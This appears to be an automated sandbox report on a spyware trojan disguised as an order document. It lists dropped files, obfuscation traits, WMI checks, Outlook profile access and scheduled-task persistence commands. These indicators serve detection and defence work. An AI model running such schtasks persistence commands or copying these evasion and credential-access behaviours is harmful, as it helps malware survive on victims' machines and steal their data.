Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998669 0_2_07998669
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993528 0_2_07993528
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993D58 0_2_07993D58
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07997D50 0_2_07997D50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993D48 0_2_07993D48
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07994A80 0_2_07994A80
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993AB9 0_2_07993AB9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799A2B7 0_2_0799A2B7
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993AC8 0_2_07993AC8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799A2C8 0_2_0799A2C8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993250 0_2_07993250
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993242 0_2_07993242
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07994A69 0_2_07994A69
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079909F8 0_2_079909F8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079938B0 0_2_079938B0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079938C0 0_2_079938C0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990006 0_2_07990006
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799003A 0_2_0799003A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07999050 0_2_07999050
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07999043 0_2_07999043
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0F2E0DD3 0_2_0F2E0DD3
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_0120F5D8 4_2_0120F5D8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_01206680 4_2_01206680
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_0120F920 4_2_0120F920
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAD0B8 4_2_06CAD0B8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CADA04 4_2_06CADA04
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAA0FC 4_2_06CAA0FC
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0E880 5_2_02C0E880
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0E870 5_2_02C0E870
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0BFF4 5_2_02C0BFF4
Sample file is different than original file name gathered from version info
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.353975152.0000000008FF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCassa.dll< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000000.294120479.0000000000BF8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.339949264.0000000003165000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.561914622.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000000.334273963.000000000042A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WsdnBq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ORDER (6256 OS)#391 PI.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Jump to behavior
Source: ORDER (6256 OS)#391 PI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe C:\Users\user\AppData\Roaming\WsdnBq.exe
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path} Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path} Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Roaming\WsdnBq.exe Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Local\Temp\tmpF47D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/5@6/4
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: ORDER (6256 OS)#391 PI.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2236:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Mutant created: \Sessions\1\BaseNamedObjects\pwiUZWOdBetP
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: ORDER (6256 OS)#391 PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORDER (6256 OS)#391 PI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORDER (6256 OS)#391 PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F663 push ecx; iretd 0_2_0798F66D
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07996226 push ss; iretd 0_2_07996227
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA14C8 push eax; iretd 4_2_06CA15D9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA0EBD push es; retf 4_2_06CA0EC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAAD5E push es; ret 4_2_06CAAD60
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA092D push 8B000005h; retf 4_2_06CA0937
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA144F push es; ret 4_2_06CA1480
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1441 push cs; retf 0006h 4_2_06CA1442
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA141D push cs; retf 0006h 4_2_06CA141E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1413 push es; iretd 4_2_06CA1414
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1429 push cs; retf 0006h 4_2_06CA142A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA142D push cs; retf 0006h 4_2_06CA142E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1421 push cs; retf 0006h 4_2_06CA1422
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1425 push cs; retf 0006h 4_2_06CA1426
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1439 push cs; retf 0006h 4_2_06CA143A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA143D push cs; retf 0006h 4_2_06CA143E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1431 push cs; retf 0006h 4_2_06CA1432
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1435 push cs; retf 0006h 4_2_06CA1436
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA123F push es; retf 4_2_06CA1240
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_0E820FED push FFFFFF8Bh; iretd 5_2_0E820FEF
Source: initial sample Static PE information: section name: .text entropy: 7.6706447927786225
Source: initial sample Static PE information: section name: .text entropy: 7.6706447927786225
Drops PE files
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Roaming\WsdnBq.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
